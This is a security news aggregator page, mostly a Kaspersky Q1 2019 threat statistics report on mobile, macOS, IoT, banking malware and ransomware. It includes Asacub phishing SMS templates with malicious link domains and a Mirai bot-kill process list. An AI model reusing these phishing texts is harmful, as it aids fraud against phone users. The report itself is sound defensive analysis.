Viry a Červi

We'll hack back at Russians, declare UK ministers in cyber-Blitz blitz

The Register - Anti-Virus - 23 Květen, 2019 - 14:09
NATO's getting in on the action too

British ministers are stepping up their rhetoric on cyber warfare, with £22m to be splurged on embiggening an "offensive hacking" unit as Foreign Secretary Jeremy Hunt vowed to retaliate against Russian cyber-attacks.…

Kategorie: Viry a Červi

Tor Browser for Android 8.5 offers mobile users privacy boost

Sophos Naked Security - 23 Květen, 2019 - 13:39
After nine months of alpha testing, a stable release of the Tor browser for Android can now be downloaded from Google’s Play store or direct from the Project’s website.

Mozilla fixes bugs, improves privacy in latest Firefox release

Sophos Naked Security - 23 Květen, 2019 - 12:40
Mozilla rolled out version 67 of its Firefox browser this week, fixing some security bugs and introducing a host of privacy features.

The city of Baltimore is being held hostage by ransomware

Sophos Naked Security - 23 Květen, 2019 - 12:31
The mayor said no—for now—to paying 13 Bitcoins to (purportedly) unlock all seized systems. Manual rebuilding could take months.

Phisher folk reel in Computacenter security vetting mailbox packed with sensitive staff data

The Register - Anti-Virus - 23 Květen, 2019 - 12:05
Haul included employee passports, driving licences, bank statements and more

The third-party mailbox used by Computacenter employees and contractors to deposit data for security clearance applications has been hacked and used in phishing scams.…

Kategorie: Viry a Červi

IT threat evolution Q1 2019. Statistics

Kaspersky Securelist - 23 Květen, 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans
Mobile threats Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of detected malicious installation packages, Q2 2018 – Q1 2019 (download)

Distribution of detected mobile apps by type

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019 (download)

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %* 1 DangerousObject.Multi.Generic 54.26 2 Trojan.AndroidOS.Boogr.gsh 12.72 3 Trojan-Banker.AndroidOS.Asacub.snt 4.98 4 DangerousObject.AndroidOS.GenericML 4.35 5 Trojan-Banker.AndroidOS.Asacub.a 3.49 6 Trojan-Dropper.AndroidOS.Hqwar.bb 3.36 7 Trojan-Dropper.AndroidOS.Lezok.p 2.60 8 Trojan-Banker.AndroidOS.Agent.ep 2.53 9 Trojan.AndroidOS.Dvmap.a 1.84 10 Trojan-Banker.AndroidOS.Svpeng.q 1.83 11 Trojan-Banker.AndroidOS.Asacub.cp 1.78 12 Trojan.AndroidOS.Agent.eb 1.74 13 Trojan.AndroidOS.Agent.rt 1.72 14 Trojan-Banker.AndroidOS.Asacub.ce 1.70 15 Trojan-SMS.AndroidOS.Prizmes.a 1.66 16 Exploit.AndroidOS.Lotoor.be 1.59 17 Trojan-Dropper.AndroidOS.Hqwar.gen 1.57 18 Trojan-Dropper.AndroidOS.Tiny.d 1.51 19 Trojan-Banker.AndroidOS.Svpeng.ak 1.49 20 Trojan.AndroidOS.Triada.dl 1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Map of mobile malware infection attempts, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile malware:

Country* %** 1 Pakistan 37.54 2 Iran 31.55 3 Bangladesh 28.38 4 Algeria 24.03 5 Nigeria 22.59 6 India 21.53 7 Tanzania 20.71 8 Indonesia 17.16 9 Kenya 16.27 10 Mexico 12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019 (download)

Verdict %* 1 Trojan-Banker.AndroidOS.Asacub.snt 23.32 2 Trojan-Banker.AndroidOS.Asacub.a 16.35 3 Trojan-Banker.AndroidOS.Agent.ep 11.82 4 Trojan-Banker.AndroidOS.Svpeng.q 8.57 5 Trojan-Banker.AndroidOS.Asacub.cp 8.33 6 Trojan-Banker.AndroidOS.Asacub.ce 7.96 7 Trojan-Banker.AndroidOS.Svpeng.ak 7.00 8 Trojan-Banker.AndroidOS.Agent.eq 4.96 9 Trojan-Banker.AndroidOS.Asacub.ar 2.47 10 Trojan-Banker.AndroidOS.Hqwar.t 2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile banking threats, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans:

Country* %** 1 Australia 0.81 2 Turkey 0.73 3 Russia 0.64 4 South Africa 0.35 5 Ukraine 0.31 6 Tajikistan 0.25 7 Armenia 0.23 8 Kyrgyzstan 0.17 9 US 0.16 10 Moldova 0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019) (download)

Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.ah 28.91 2 Trojan-Ransom.AndroidOS.Rkor.h 19.42 3 Trojan-Ransom.AndroidOS.Svpeng.aj 9.46 4 Trojan-Ransom.AndroidOS.Small.as 8.81 5 Trojan-Ransom.AndroidOS.Rkor.snt 5.36 6 Trojan-Ransom.AndroidOS.Svpeng.ai 5.21 7 Trojan-Ransom.AndroidOS.Small.o 3.24 8 Trojan-Ransom.AndroidOS.Fusob.h 2.74 9 Trojan-Ransom.AndroidOS.Small.ce 2.49 10 Trojan-Ransom.AndroidOS.Svpeng.snt 2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware:

Country* %** 1 US 1.54 2 Kazakhstan 0.36 3 Iran 0.28 4 Pakistan 0.14 5 Mexico 0.10 6 Saudi Arabia 0.10 7 Canada 0.07 8 Italy 0.07 9 Indonesia 0.05 10 Belgium 0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 24.62 2 AdWare.OSX.Spc.a 20.07 3 AdWare.OSX.Pirrit.j 10.31 4 AdWare.OSX.Pirrit.p 8.44 5 AdWare.OSX.Agent.b 8.03 6 AdWare.OSX.Pirrit.o 7.45 7 AdWare.OSX.Pirrit.s 6.88 8 AdWare.OSX.Agent.c 6.03 9 AdWare.OSX.MacSearch.a 5.95 10 AdWare.OSX.Cimpli.d 5.72 11 AdWare.OSX.Mcp.a 5.71 12 AdWare.OSX.Pirrit.q 5.55 13 AdWare.OSX.MacSearch.d 4.48 14 AdWare.OSX.Agent.a 4.39 15 Downloader.OSX.InstallCore.ab 3.88 16 AdWare.OSX.Geonei.ap 3.75 17 AdWare.OSX.MacSearch.b 3.48 18 AdWare.OSX.Geonei.l 3.42 19 AdWare.OSX.Bnodlero.q 3.33 20 RiskTool.OSX.Spigot.a 3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography Country* %** 1 France 11.54 2 Spain 9.75 3 India 8.83 4 Italy 8.20 5 US 8.03 6 Canada 7.94 7 UK 7.52 8 Russia 7.51 9 Brazil 7.45 10 Mexico 6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a и AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.

IoT attacks Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive – scanning for the presence of procfs.

But we expect it to become more complex in the near future.

Second, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in the process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.

Taking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.

SSH 17% Telnet 83%

Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

SSH 64% Telnet 36%

Table of distribution of cybercriminal working sessions with Kaspersky Lab’s traps, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

Telnet-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019 (download)

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps.

Country %* 1 Egypt 13.46 2 China 13.19 3 Brazil 11.09 4 Russia 7.17 5 Greece 4.45 6 Jordan 4.14 7 US 4.12 8 Iran 3.24 9 India 3.14 10 Turkey 2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

Verdict %* 1 Backdoor.Linux.Mirai.b 71.39 2 Backdoor.Linux.Mirai.ba 20.15 3 Backdoor.Linux.Mirai.au 4.85 4 Backdoor.Linux.Mirai.c 1.35 5 Backdoor.Linux.Mirai.h 1.23 6 Backdoor.Linux.Mirai.bj 0.72 7 Trojan-Downloader.Shell.Agent.p 0.06 8 Backdoor.Linux.Hajime.b 0.06 9 Backdoor.Linux.Mirai.s 0.06 10 Backdoor.Linux.Gafgyt.bj 0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019 (download)

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps.

Verdict %* 1 China 23.24 2 US 9.60 3 Russia 6.07 4 Brazil 5.31 5 Germany 4.20 6 Vietnam 4.11 7 France 3.88 8 India 3.55 9 Egypt 2.53 10 Korea 2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH

Most often, a successful SSH-based attack resulted in the following types of malware downloaded of victim’s device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p

Financial threats Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by financial malware, Q1 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of banking malware attacks, Q1 2019 (download)

Top 10 countries by share of attacked users Country* %** South Korea 2.2 China 2.1 Belarus 1.6 Venezuela 1.6 Serbia 1.6 Greece 1.5 Egypt 1.4 Pakistan 1.3 Cameroon 1.3 Zimbabwe 1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families Name Verdicts %* 1 RTM Trojan-Banker.Win32.RTM 27.42 2 Zbot Trojan.Win32.Zbot 22.86 3 Emotet Backdoor.Win32.Emotet 9.36 4 Trickster Trojan.Win32.Trickster 6.57 5 Nymaim Trojan.Win32.Nymaim 5.85 6 Nimnul Virus.Win32.Nimnul 4.59 7 SpyEye Backdoor.Win32.SpyEye 4.29 8 Neurevt Trojan.Win32.Neurevt 3.56 9 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 2.64 10 Tinba Trojan-Banker.Win32.Tinba 1.39

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to assemble an archive that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

